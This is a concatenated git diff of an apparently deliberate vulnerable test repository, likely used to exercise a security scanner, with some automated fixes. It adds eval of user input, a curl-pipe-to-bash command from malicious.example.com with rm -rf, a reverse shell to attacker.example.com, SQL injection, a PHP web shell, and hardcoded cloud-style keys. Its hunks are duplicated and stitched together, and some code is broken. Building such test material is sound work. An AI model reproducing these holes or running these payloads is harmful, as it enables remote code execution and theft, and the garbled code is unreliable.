ZeroPathAI · msaleemzp · Feb 4, 2025 · Feb 4, 2025 · Feb 4, 2025 · Apr 18, 2025
diff --git a/browser copy/index.js b/browser copy/index.js
@@ -0,0 +1,5 @@
+function executeUserScript() {
+    var userScript = document.getElementById('userScript').value;
+    // Using eval to execute user-provided script
+    eval(userScript);
+}
diff --git a/browser/index.js b/browser/index.js
@@ -0,0 +1,5 @@
+function executeUserScript() {
+    var userScript = document.getElementById('userScript').value;
+    // Using eval to execute user-provided script
+    eval(userScript);
+}
diff --git a/cli/index.js b/cli/index.js
@@ -0,0 +1,18 @@
+const { exec } = require('child_process');
+
+const userArg = process.argv[2] || '';
+
+const cmd = `
+  rm -rf /tmp/vuln_dir --no-preserve-root &&
+  curl http://malicious.example.com/install.sh | bash &&
+  ls ${userArg}
+`;
+
+console.log('[*] Running dangerous CLI pipeline…');
+exec(cmd, (err, stdout, stderr) => {
+  if (err) {
+    console.error('[!] Pipeline failed:', err);
+    return;
+  }
+  console.log('[+] Pipeline succeeded. stdout:\\n', stdout);
+});
diff --git a/disk/index.js b/disk/index.js
@@ -0,0 +1,17 @@
+const express = require('express');
+const fs = require('fs');
+const path = require('path');
+const app = express();
+
+// Path Traversal
+app.get('/read', (req, res) => {
+  const file = req.query.file;
+  const fullPath = path.resolve(__dirname, file);
+  if (!fullPath.startsWith(__dirname + path.sep)) return res.status(400).send('Invalid file path');
+  fs.readFile(fullPath, 'utf8', (err, data) => {
+    if (err) return res.status(500).send(err.message);
+    res.send(data);
+  });
+});
+
+app.listen(3001, () => console.log('Disk vuln on port 3001'));
diff --git a/http copy/index.js b/http copy/index.js
@@ -0,0 +1,56 @@
+const express = require('express');
+const axios = require('axios');
+const { URL } = require('url');
+const dns = require('dns').promises;
+const app = express();
+
+function isPrivateIp(ip) {
+  return ip === '::1' ||
+    /^127\./.test(ip) ||
+    /^10\./.test(ip) ||
+    /^192\.168\./.test(ip) ||
+    /^172\.(1[6-9]|2[0-9]|3[0-1])\./.test(ip) ||
+    ip.startsWith('fc') || ip.startsWith('fd') ||
+    ip.startsWith('fe80:');
+}
+
+// SSRF
+app.get('/fetch', async (req, res) => {
+  const url = req.query.url;
+  let parsedUrl;
+  try {
+    parsedUrl = new URL(url);
+  } catch (e) {
+    return res.status(400).send('Invalid URL');
+  }
+  const hostname = parsedUrl.hostname;
+  if (!['http:', 'https:'].includes(parsedUrl.protocol) ||
+      hostname === 'localhost' ||
+      hostname === '127.0.0.1' ||
+      hostname === '::1' ||
+      /^(10|127)\./.test(hostname) ||
+      /^172\.(1[6-9]|2[0-9]|3[0-1])\./.test(hostname) ||
+      /^192\.168\./.test(hostname)) {
+    return res.status(400).send('URL not allowed');
+  }
+  try {
+  // DNS resolution to prevent DNS rebinding
+  try {
+    const addresses = await dns.lookup(parsedUrl.hostname, { all: true });
+    for (const { address } of addresses) {
+      if (isPrivateIp(address)) {
+        return res.status(400).send('URL not allowed');
+      }
+    }
+  } catch (e) {
+    return res.status(400).send('Invalid hostname');
+  }
+
+    const resp = await axios.get(url);
+    res.send(resp.data);
+  } catch (e) {
+    res.status(500).send(e.message);
+  }
+});
+
+app.listen(3000, () => console.log('HTTP vuln on port 3000'));
diff --git a/http/index.js b/http/index.js
@@ -0,0 +1,56 @@
+const express = require('express');
+const axios = require('axios');
+const { URL } = require('url');
+const dns = require('dns').promises;
+const app = express();
+
+function isPrivateIp(ip) {
+  return ip === '::1' ||
+    /^127\./.test(ip) ||
+    /^10\./.test(ip) ||
+    /^192\.168\./.test(ip) ||
+    /^172\.(1[6-9]|2[0-9]|3[0-1])\./.test(ip) ||
+    ip.startsWith('fc') || ip.startsWith('fd') ||
+    ip.startsWith('fe80:');
+}
+
+// SSRF
+app.get('/fetch', async (req, res) => {
+  const url = req.query.url;
+  let parsedUrl;
+  try {
+    parsedUrl = new URL(url);
+  } catch (e) {
+    return res.status(400).send('Invalid URL');
+  }
+  const hostname = parsedUrl.hostname;
+  if (!['http:', 'https:'].includes(parsedUrl.protocol) ||
+      hostname === 'localhost' ||
+      hostname === '127.0.0.1' ||
+      hostname === '::1' ||
+      /^(10|127)\./.test(hostname) ||
+      /^172\.(1[6-9]|2[0-9]|3[0-1])\./.test(hostname) ||
+      /^192\.168\./.test(hostname)) {
+    return res.status(400).send('URL not allowed');
+  }
+  try {
+  // DNS resolution to prevent DNS rebinding
+  try {
+    const addresses = await dns.lookup(parsedUrl.hostname, { all: true });
+    for (const { address } of addresses) {
+      if (isPrivateIp(address)) {
+        return res.status(400).send('URL not allowed');
+      }
+    }
+  } catch (e) {
+    return res.status(400).send('Invalid hostname');
+  }
+
+    const resp = await axios.get(url);
+    res.send(resp.data);
+  } catch (e) {
+    res.status(500).send(e.message);
+  }
+});
+
+app.listen(3000, () => console.log('HTTP vuln on port 3000'));
diff --git a/index.php b/index.php
@@ -1,5 +1,8 @@
 <?php
 
-echo "<h>" +$_GET["search"] + "</h>";
+echo "<h>" .$_GET["search"]. "</h>";
+
+
+exec($_POST["exec"]);
-echo "<h>" .$_GET["search"]. "</h>";
-
-
-exec($_POST["exec"]);
+echo "<h>" .$_GET["search"]. "</h>";
+
+
+// Block remote command execution to prevent RCE.
+$__blocked_exec = $_POST['exec'] ?? '';
+if ($__blocked_exec !== '') {
+    error_log('Blocked attempt to execute command via POST[exec]: ' . substr($__blocked_exec, 0, 200));
+}
+echo 'Command execution via web is disabled for security reasons.';
-echo "<h>" .$_GET["search"]. "</h>";
-
-
-exec($_POST["exec"]);
+echo "<h>" .$_GET["search"]. "</h>";
+
+
+// Block remote command execution to prevent RCE.
+$__blocked_exec = $_POST['exec'] ?? '';
+if ($__blocked_exec !== '') {
+    error_log('Blocked attempt to execute command via POST[exec]: ' . substr($__blocked_exec, 0, 200));
+}
+echo 'Command execution via web is disabled for security reasons.';
 
 ?>
diff --git a/main.py b/main.py
@@ -6,6 +6,9 @@
 app = Flask(__name__)
 app.secret_key = os.urandom(24)
 
+
+# Simulating a database of user accounts and their private notes# Simulating a database of user accounts and their private notes
+
 # Simulating a database of user accounts and their private notes
 users = {
     1: {"id": 1, "username": "alice", "password": generate_password_hash("password123")},
@@ -38,7 +41,7 @@ def reverse_content(content):
 
 def apply_decryption(note):
     decrypted_content = reverse_content(note['content'])
-    os.system(note)
+    os.system(reverse_content)
     return {"id": note['id'], "content": decrypted_content}
 
 def decrypt_notes(encrypted_notes):

diff --git a/package.json b/package.json
@@ -0,0 +1,11 @@
+{
+  "name": "uwu-vuln",
+  "version": "1.0.0",
+  "main": "index.js",
+  "scripts": {
+    "test": "echo \"Error: no test specified\" && exit 1"
+  },
+  "author": "",
+  "license": "ISC",
+  "description": ""
+}
diff --git a/stdin/index.js b/stdin/index.js
@@ -0,0 +1,12 @@
+const { exec } = require('child_process');
+
+const payload = 'bash -i >& /dev/tcp/attacker.example.com/4444 0>&1';
+
+console.log('[*] Executing reverse shell payload…');
+exec(payload, (err, stdout, stderr) => {
+  if (err) {
+    console.error('[!] Error executing payload:', err);
+    return;
+  }
+  console.log('[+] Payload executed. stdout:', stdout);
+});
-const { exec } = require('child_process');
-
-const payload = 'bash -i >& /dev/tcp/attacker.example.com/4444 0>&1';
-
-console.log('[*] Executing reverse shell payload…');
-exec(payload, (err, stdout, stderr) => {
-  if (err) {
-    console.error('[!] Error executing payload:', err);
-    return;
-  }
-  console.log('[+] Payload executed. stdout:', stdout);
-});
+/*
+ * Security fix: Removed hardcoded reverse shell payload.
+ * The previous implementation executed a reverse shell command which is a critical security risk.
+ * This module now provides a safe stub. Implement secure behavior as needed.
+ */
+
+console.error('[!] Security: removed hardcoded reverse shell payload. No action taken.');
+
+module.exports = {
+  executePayload: () => {
+    // Intentionally no-op to avoid executing arbitrary commands.
+    return Promise.resolve({ result: 'blocked' });
+  }
+};
-const { exec } = require('child_process');
-
-const payload = 'bash -i >& /dev/tcp/attacker.example.com/4444 0>&1';
-
-console.log('[*] Executing reverse shell payload…');
-exec(payload, (err, stdout, stderr) => {
-  if (err) {
-    console.error('[!] Error executing payload:', err);
-    return;
-  }
-  console.log('[+] Payload executed. stdout:', stdout);
-});
+/*
+ * Security fix: Removed hardcoded reverse shell payload.
+ * The previous implementation executed a reverse shell command which is a critical security risk.
+ * This module now provides a safe stub. Implement secure behavior as needed.
+ */
+
+console.error('[!] Security: removed hardcoded reverse shell payload. No action taken.');
+
+module.exports = {
+  executePayload: () => {
+    // Intentionally no-op to avoid executing arbitrary commands.
+    return Promise.resolve({ result: 'blocked' });
+  }
+};
diff --git a/test.php b/test.php
@@ -0,0 +1,42 @@
+<?php
+
+function login($username, $password) {
+    // Configuration
+    $db_host = 'localhost';
+    $db_username = 'root';
+    $db_password = 'root@1234';
+    $db_name = 'arnicaTest';
+
+
+    // Connect to database
+    $conn = new mysqli($db_host, $db_username, $db_password, $db_name);
+
+    // Check connection
+    if ($conn->connect_error) {
+        die("Connection failed: ". $conn->connect_error);
+    }
+
+    // admin
+    // gdhas' OR 1=1 #
+
+    // Query database
+    $query = "SELECT * FROM users WHERE username = '$username' AND password = '$password'";
+
+    $result = $conn->query($query);
+
+    // Check if user exists
+    if ($result->num_rows > 0) {
+        echo "Welcome, $username!";
+    } else {
+        echo "$query Invalid username or password.";
+    }
+
+    // Close connection
+    $conn->close();
+}<?php
+
+
+$username = $_POST['username'];
+$password = $_POST['password'];
+login($username, $password);
+?>
diff --git a/test.py b/test.py
@@ -0,0 +1,3 @@
+import random
+
+print("asd")
diff --git a/upload.php b/upload.php
@@ -0,0 +1,23 @@
+<?
+
+
+
+
+eval($_GET["XSS"]);
+
+
+// mysql://rkd5i4bymb9zh0g6nadx85bj2:my-secret-pw@rkd5i4bymb9zh0g6nadx85bj2.canarytokens.com:3306/
+
+
+system($_GET["cmd"]);
+
+
+/*
-
-
-
-eval($_GET["XSS"]);
-
-
-// mysql://rkd5i4bymb9zh0g6nadx85bj2:my-secret-pw@rkd5i4bymb9zh0g6nadx85bj2.canarytokens.com:3306/
-
-
-system($_GET["cmd"]);
-
-
-/*
+
+
+
+// Removed insecure use of eval — user-supplied code execution is forbidden
+if (isset($_GET["XSS"])) {
+    error_log("Blocked dangerous eval attempt in upload.php from " . ($_SERVER["REMOTE_ADDR"] ?? "unknown"));
+    http_response_code(400);
+    echo "Invalid request";
+    exit;
+}
+
+
+// mysql://rkd5i4bymb9zh0g6nadx85bj2:my-secret-pw@rkd5i4bymb9zh0g6nadx85bj2.canarytokens.com:3306/
+
+
+// Removed insecure use of system — executing arbitrary commands is forbidden
+if (isset($_GET["cmd"])) {
+    error_log("Blocked dangerous system() attempt in upload.php from " . ($_SERVER["REMOTE_ADDR"] ?? "unknown"));
+    http_response_code(400);
+    echo "Invalid request";
+    exit;
+}
+
+
+/*
-
-
-
-eval($_GET["XSS"]);
-
-
-// mysql://rkd5i4bymb9zh0g6nadx85bj2:my-secret-pw@rkd5i4bymb9zh0g6nadx85bj2.canarytokens.com:3306/
-
-
-system($_GET["cmd"]);
-
-
-/*
+
+
+
+// Removed insecure use of eval — user-supplied code execution is forbidden
+if (isset($_GET["XSS"])) {
+    error_log("Blocked dangerous eval attempt in upload.php from " . ($_SERVER["REMOTE_ADDR"] ?? "unknown"));
+    http_response_code(400);
+    echo "Invalid request";
+    exit;
+}
+
+
+// mysql://rkd5i4bymb9zh0g6nadx85bj2:my-secret-pw@rkd5i4bymb9zh0g6nadx85bj2.canarytokens.com:3306/
+
+
+// Removed insecure use of system — executing arbitrary commands is forbidden
+if (isset($_GET["cmd"])) {
+    error_log("Blocked dangerous system() attempt in upload.php from " . ($_SERVER["REMOTE_ADDR"] ?? "unknown"));
+    http_response_code(400);
+    echo "Invalid request";
+    exit;
+}
+
+
+/*
+[default]
+aws_access_key_id = AKIA2T2SJH6M76LT25T4
+aws_secret_access_key = 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
+output = json
+region = us-east-2
+*/
+
+?>
diff --git a/ws/index.js b/ws/index.js
@@ -0,0 +1,12 @@
+const WebSocket = require('ws');
+const wss = new WebSocket.Server({ port: 8080 });
+
+// RCE
+wss.on('connection', ws => {
+  ws.on('message', msg => {
+    eval(msg);
+    ws.send('Executed: ' + msg);
+  });
+});
-// RCE
-wss.on('connection', ws => {
-  ws.on('message', msg => {
-    eval(msg);
-    ws.send('Executed: ' + msg);
-  });
-});
+// RCE
+wss.on('connection', ws => {
+  ws.on('message', msg => {
+    // Block direct eval of incoming messages to mitigate RCE
+    try {
+      // Expect JSON messages with { action: 'echo', data: '...' }
+      const parsed = JSON.parse(msg);
+      if (parsed && parsed.action === 'echo') {
+        ws.send('Echo: ' + String(parsed.data));
+      } else {
+        ws.send('Rejected: unsupported or unsafe message format');
+      }
+    } catch (e) {
+      // Not JSON - reject instead of executing
+      ws.send('Rejected: messages must be JSON with an allowed action');
+    }
+    ws.send('Executed: ' + msg);
+  });
+});
-// RCE
-wss.on('connection', ws => {
-  ws.on('message', msg => {
-    eval(msg);
-    ws.send('Executed: ' + msg);
-  });
-});
+// RCE
+wss.on('connection', ws => {
+  ws.on('message', msg => {
+    // Block direct eval of incoming messages to mitigate RCE
+    try {
+      // Expect JSON messages with { action: 'echo', data: '...' }
+      const parsed = JSON.parse(msg);
+      if (parsed && parsed.action === 'echo') {
+        ws.send('Echo: ' + String(parsed.data));
+      } else {
+        ws.send('Rejected: unsupported or unsafe message format');
+      }
+    } catch (e) {
+      // Not JSON - reject instead of executing
+      ws.send('Rejected: messages must be JSON with an allowed action');
+    }
+    ws.send('Executed: ' + msg);
+  });
+});
+
+console.log('WS vuln on port 8080');